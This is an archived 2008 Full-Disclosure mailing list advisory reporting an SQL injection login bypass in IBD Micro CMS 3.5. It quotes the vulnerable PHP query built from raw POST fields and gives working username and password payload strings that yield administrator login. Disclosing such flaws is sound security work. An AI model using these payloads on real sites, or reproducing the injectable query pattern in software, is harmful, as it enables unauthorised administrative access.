| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <51ebcc05895311792a5cbec609ed153e@s2.nexpaserver.de>
Date: Mon, 12 May 2008 18:39:52 +0200
From: <skyout.fd@...ed-security.net>
To: full-disclosure@...ts.grok.org.uk
Subject: [SkyOut/Wired Security] SQL Injection in IDB
Micro CMS 3.5 (Login Bypass)
Hey guys,
I came accross a SQL Injection bug in IBD Micro CMS in version 3.5
and maybe lower...
News about it:
http://wired-security.net/archive/2008/may/index.php#12052008
Advisory to read:
http://wired-security.net/texts/advisories/IBD_Micro_CMS_3.5_SQL_Injection_Login_Bypass_Advisory.txt
---
In Short:
--- SNIP ---
if ($i == 0) {
$sql = '
SELECT *
FROM microcms_administrators
WHERE administrators_username = "' . $_POST['administrators_username'] .
'" and
administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
$user_result = mysql_query($sql);
--- SNIP ---
Username: " or "1" = "1
Password: ") or "1" = "1" or PASSWORD("
Will result in:
--- SNIP ---
$sql = '
SELECT *
FROM microcms_administrators
WHERE administrators_username = "" or "1" = "1" and
administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';
--- SNIP ---
-> Logged in as administrator!
Greets,
SkyOut/Wired Security
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists